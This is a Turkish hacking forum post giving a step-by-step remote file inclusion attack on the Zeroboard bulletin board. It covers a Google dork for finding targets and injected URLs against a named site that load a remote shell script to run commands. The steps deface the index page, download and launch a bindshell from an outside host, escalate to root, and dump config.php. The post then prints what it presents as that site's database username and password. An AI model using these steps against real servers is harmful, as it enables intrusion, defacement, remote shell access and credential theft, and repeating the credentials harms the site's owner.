Zeroboard Bug
-
[Bazı bölümler alıntıdır]
Bu işlemi yapmak için ihtiyaç duyulan prg. matrix.txt (remote file inclusion)..
bu açıkta da yine google'dan yararlanıyoruz..google.com a girip findsite.exe olarak aratıyoruz..
allinurl: /zboard/zboard.php
Daha sonra da çıkan linkler den birini seçiyoruz ve i.explorer a yapıştırıyoruz..
http://juotte.com/bbs/include
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=uname -a;pwd;id
Daha sonra da siteye ;
http://juotte.com/bbs/include
/write.php?dir=http://masal.250free.com/matrix.txt?&cmd=cd /home/juotte/www;cyb3r-spyc was Here >index.html
istediğimizi yapıyoruz..
[eğer olmassa dizin korumaldır o zaman servera bindshell kuruyoruz.]
http://juotte.com/bbs/include
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;
wget BindshellinOlduğuSite.com/bindshell
http://juotte.com/bbs/include
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;chmod 777 bindshell
http://juotte.com/bbs/include
/write.php?dir=http://masal.250free.com/matrxix.txt?&cmd=cd /tmp;./bindshell
ve putty tarzı programlar vesilesiyle bindshellin açtıgı porttan bağlanıyoruz.
root olmak için ise gerekli local exploiti bulup serverda /tmp dızınınde derleyip calıstırıyoruz.
config.php yı goruntulemek için :
http://localhost.com/zboard/include/
write.php?dir=http://masal.250free.com/shell.gif?&cmd=cd%20. .;cat%20config.php
<?
localhost
juotte <-------------- - user
juotte7034 <--------------- password
juotte
?>
user ve pass karşımızda..daha sonra da ftp den user ve pass olarak bağlanabilirz..
CYB3R-SPY
-
yazarı belirtseydın barı kimdi yazar M@TRiX = zeronc = masal75 mi acaba?
Toplam Hit: 2412 Toplam Mesaj: 2
